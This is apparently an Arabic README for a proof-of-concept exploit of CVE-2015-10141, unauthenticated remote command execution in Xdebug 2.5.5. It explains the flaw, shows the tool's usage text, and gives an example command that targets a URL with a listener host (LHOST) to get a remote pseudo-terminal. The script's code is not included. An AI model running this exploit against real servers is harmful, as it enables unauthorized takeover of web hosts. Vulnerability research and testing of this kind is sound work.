
استغلال إثبات المفهوم (POC) لـ CVE-2015-10141
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141
توجد ثغرة حقن أوامر على مستوى نظام التشغيل غير مصادَق عليها في إصدارات Xdebug 2.5.5 وما قبلها، وهو امتداد لتصحيح أخطاء PHP. عند تفعيل التصحيح عن بُعد، يستمع Xdebug على المنفذ 9000 ويقبل أوامر بروتوكول المصحح دون أي مصادقة. يمكن للمهاجم إرسال أمر eval مخصص عبر هذه الواجهة لتنفيذ كود PHP عشوائي، قد يستدعي دوالًا على مستوى النظام مثل system() أو passthru(). يؤدي ذلك إلى اختراق كامل للمضيف بصلاحيات مستخدم خادم الويب.
usage: CVE-2015-10141.py [-h] -u URL -l LHOST
CVE-2015-10141 - xdebug v2.5.5 RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL URL of the target
-l, --lhost LHOST LHOST to trigger the RCE
ما عليك سوى تشغيل الأداة وتزويدها برابط صحيح لملف PHP مثل index.php مع عنوان المضيف المحلي. بعدها ستحاول الأداة إنشاء طرفية زائفة (pseudo-terminal) تتيح لك تنفيذ الأوامر عن بُعد.
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
ضع في اعتبارك أنه في بعض الحالات لن يظهر المخرج إطلاقًا وسترى فقط السطر الأول من الأمر المنفَّذ؛ هذه ليست مشكلة في السكربت، بل إن الثغرة تعمل بهذه الطريقة)
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210
هذا المشروع مرخّص بموجب رخصة MIT
حقوق النشر © 2025، D3Ext